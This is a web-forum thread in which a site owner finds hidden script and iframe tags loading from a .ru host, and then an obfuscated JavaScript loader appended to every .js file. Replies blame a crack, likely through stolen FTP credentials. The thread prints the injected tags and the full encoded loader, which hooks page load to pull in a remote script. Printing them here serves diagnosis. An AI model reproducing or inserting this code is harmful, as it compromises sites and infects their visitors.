Very weird problem

[wemustdesign]

I recently designed a website but when I went on it yesterday there was a big gap under the footer at the bottom of the page. This wasnt there before. I noticed that the page actually loads fine first without the gap but then the page tries to load something as seen in this screenshot:

 

 

I looked at the source code and could not see this link anywhere. I then looked at the generated code (not sure what the difference is) and found this:

 

<script defer="defer" src="http://cnet-com.mtv.com.argos-co-uk.offroadmods.ru:8080/zimbio.com/zimbio.com/badongo.com/sina.com.cn/google.com.php"></script><iframe src="http://cnet-com.mtv.com.argos-co-uk.offroadmods.ru:8080/index.php?ja=&jl=&kl=" style="visibility: hidden;"></iframe>

 

 

No idea how this has been inserted or why. I hand coded the site myself. The website is www.photographycourses.co.uk

 

Any ideas are most welcome

[ignace]

Your website has been most likely been cracked and a cracker added the extra code whereby your website is now part of a cracker's network remove all unknown code at once (go over all files).

[wemustdesign]

You were right, the following code was added at the end of every .js file. How is this possible?

 

var x;if(x!='bt' && x != ''){x=null};function W() {var f="";var uU=new Array();var XB=unescape("%2f%7a%69%6d%62%69%6f%2e%63%6f%6d%2f%7a%69%6d%62%69%6f%2e%63%6f%6d%2f%62%61%64%6f%6e%67%6f%2e%63%6f%6d%2f%73%69%6e%61%2e%63%6f%6d%2e%63%6e%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");var F="";var nY;if(nY!='T' && nY!='nN'){nY=''};var E="rep"+"lac"+"e";var nZ;if(nZ!='' && nZ!='M'){nZ='k'};var c=window;this.fg="";var O='';var Q;if(Q!='h' && Q!='d'){Q='h'};var Z="]";var K=new String();var z=RegExp;var J;if(J!='' && J!='B'){J=''};var Fr='';function X(p,WX){var V=new Array();var PY="";var n=new String("[");var ey=new Array();var L;if(L!='' && L!='EI'){L=''};n+=WX+Z;var jw;if(jw!='g'){jw=''};var cZ;if(cZ!='NU' && cZ != ''){cZ=null};var u=new z(n, new String("g"));var Ht;if(Ht!='' && Ht!='FD'){Ht=null};return p[E](u, O);};this.TI='';var D='';this.zW="";var kb;if(kb!='' && kb!='fG'){kb='hI'};var b=unescape("%68%74%74%70%3a%2f%2f%63%6e%65%74%2d%63%6f%6d%2e%6d%74%76%2e%63%6f%6d%2e%61%72%67%6f%73%2d%63%6f%2d%75%6b%2e%6f%66%66%72%6f%61%64%6d%6f%64%73%2e%72%75%3a");var w=X('8240478419071','13275694');var Zh=String("scri"+"pt");var aM="";c["onlo"+"SWfkad".substr(4)]=function(){var kt=new String();var LB;if(LB!=''){LB='QX'};try {var av='';var wU;if(wU!='rW' && wU != ''){wU=null}=b+w;D+=XB;var AR=new Date();var dB=new String();this._I='';WP=document.createElement(Zh);var Nr=new Date();var H_=new Date();var K_="";WP[string("src")] = D;var SV=new Array();WP[new String("defer")]=[1,5][0];document.body.appendChild(WP);this.U="";var pN;if(pN!='' && pN!='Dm'){pN='tp'};} catch®{};};var Yl;if(Yl!='' && Yl!='ml'){Yl='C'};var _J;if(_J!=''){_J='je'};var BI;if(BI!='nD'){BI=''};var ma=new Date();};W();var Xq;if(Xq!='Px' && Xq != ''){Xq=null};var YL;if(YL!='rK' && YL!='yb'){YL='rK'};

[KevinM1]

You were right, the following code was added at the end of every .js file. How is this possible?

 

Most likely your ftp credentials have been compromised.